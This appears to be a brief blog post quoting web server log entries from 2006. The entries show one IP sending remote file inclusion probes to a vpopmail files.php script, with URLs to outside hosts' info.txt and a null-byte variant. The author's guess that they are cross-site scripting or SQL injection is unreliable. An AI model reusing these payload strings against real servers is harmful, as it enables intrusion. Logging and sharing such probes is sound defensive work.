My,what interesting search queries I have found.
195.137.160.67 – – [06/Nov/2006:13:09:56 -0500] “GET /mail/vpopmail/files.php?message_id=ftp://195.137.160.66/info.txt& HTTP/1.0” 404 20 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
195.137.160.67 – – [06/Nov/2006:13:09:58 -0500] “GET /mail/vpopmail/files.php?message_id=ftps://195.137.160.66/info.txt& HTTP/1.0” 404 20 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
195.137.160.67 – – [06/Nov/2006:13:10:01 -0500] “GET /mail/vpopmail/files.php?message_id=http://195.137.160.66/info.txt& HTTP/1.0” 404 20 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
195.137.160.67 – – [06/Nov/2006:13:10:03 -0500] “GET /mail/vpopmail/files.php?message_id=//195.209.41.200/folder/info.txt& HTTP/1.0” 404 20 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
195.137.160.67 – – [06/Nov/2006:13:10:05 -0500] “GET /mail/vpopmail/files.php?message_id=//195.209.41.200/folder/info.txt%00& HTTP/1.0” 404 20 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
I am sure they are looking for cross-site scripting or some SQL injection. I hope they’ll report their findings to me.